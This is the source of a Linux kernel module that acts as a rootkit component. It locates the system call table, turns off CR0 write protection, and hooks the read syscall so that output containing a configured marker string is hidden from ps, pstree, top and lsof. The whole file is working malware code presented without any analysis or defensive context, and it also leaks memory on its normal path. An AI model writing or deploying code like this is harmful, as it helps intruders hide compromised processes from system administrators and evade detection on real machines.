read.c

1. #include <linux/module.h>
2. #include <linux/slab.h>
3. #include <linux/string.h>
4. #include <linux/moduleparam.h>
5. #include <linux/kernel.h>
6. #include <linux/init.h>
7. #include <linux/tty.h>
8. #include <linux/unistd.h>
9. #include <linux/syscalls.h>
10. #include <linux/kallsyms.h>
11. #include <linux/fdtable.h>
12. #include <linux/set_memory.h>
13. #include <asm/uaccess.h>
14. #include <asm/cacheflush.h>
15. #include <linux/sched.h>
16. #include <linux/file.h>
17. #include <linux/proc_fs.h>
18. #include <asm/ptrace.h>
19. #include "config.h"
20.  
21.  
22.  
23.  
24. MODULE_LICENSE("GPL");
25.  
26. char *sym_name = "sys_call_table";
27.  
28. typedef asmlinkage long (*sys_call_ptr_t)(const struct pt_regs *);
29.  
30. static sys_call_ptr_t *sys_call_table;
31.  
32. typedef asmlinkage unsigned long ( *original_read ) ( const struct pt_regs *regs );
33. original_read old_read;
34.  
35.  
36.  
37. inline void mywrite_cr0(unsigned long cr0) {
38.   asm volatile("mov %0,%%cr0" : "+r"(cr0), "+m"(__force_order));
39. }
40.  
41. void enable_write_protection(void) {
42.   unsigned long cr0 = read_cr0();
43.   set_bit(16, &cr0);
44.   mywrite_cr0(cr0);
45. }
46.  
47. void disable_write_protection(void) {
48.   unsigned long cr0 = read_cr0();
49.   clear_bit(16, &cr0);
50.   mywrite_cr0(cr0);
51. }
52.  
53.  
54. asmlinkage int h4x_read( const struct pt_regs *regs ){
55.     //pr_info("inside %s\n",__func__);
56.    
57.     unsigned int fd = regs->di;
58.     //pr_info("fd %lu\n",fd);
59.  
60.         char *buf = (char*) regs->si;
61.     //pr_info("buf %p\n",buf);
62.  
63.     size_t count=regs->dx;
64.     //pr_info("regs %d\n",count); // third argument is passed into the rdx register
65.  
66.     int r;
67.     char *kbuf=(char*)kmalloc(256,GFP_KERNEL);
68.    
69.     /*If output is redirected to file or grep, hide it*/
70.     copy_from_user(kbuf,buf,255);
71.     //copy_to_user(buf, kbuf, sizeof(kbuf));
72.  
73.     if ((strstr(current->comm,"ps"))||(strstr(current->comm,"pstree"))||
74.             (strstr(current->comm,"top"))||(strstr(current->comm,"lsof"))){
75.         //pr_info("Inside current->comm, ps");
76.         if(strstr(kbuf,_H4X0R_)){
77.             //pr_info("Inside strstr(kbuf,_H4X0R_)");
78.             kfree(kbuf);
79.                 return -ENOENT;
80.         }  
81.     }
82.     //r=original_read(regs);   
83.    
84.     return old_read(regs);
85.    
86. }
87.  
88.  
89. static int __init start(void)
90. {  
91.     pr_info("Inside %s\n",__func__);
92.  
93.     sys_call_table = (sys_call_ptr_t *)kallsyms_lookup_name(sym_name);
94.     pr_info("sys_call_table %p\n",sys_call_table);
95.    
96.     old_read = (original_read)sys_call_table[__NR_read];
97.     pr_info("old_read contains %p\n",old_read);
98.    
99.     preempt_disable(); // for locking purpose
100.     disable_write_protection();
101.    
102.     pr_info("Disable page Write protection and locking \n");
103.  
104.     // Both works
105.     //sys_call_table[__NR_read] = (sys_call_ptr_t)&hacked_read_test;
106.     sys_call_table[__NR_read] = (sys_call_ptr_t)h4x_read;
107.     pr_info("sys_call_table[__NR_read] contains %p \n", sys_call_table[__NR_read]);
108.  
109.     enable_write_protection();
110.     preempt_enable();
111.     pr_info("Enable page Write protection and locking \n");
112.  
113.  
114.   return 0;
115. }
116.  
117.  
118. /*delete module rmmod*/
119. void __exit exit(void)
120. {
121.     pr_info("Inside %s\n",__func__);
122.     printk(KERN_INFO "Cleaning up syscall hook.\n");
123.    
124.     preempt_disable();
125.     disable_write_protection();
126.  
127.     sys_call_table[__NR_read] = (sys_call_ptr_t)old_read;
128.  
129.     enable_write_protection();
130.     preempt_enable();
131.  
132. }
133.  
134. module_init(start);
135. module_exit(exit);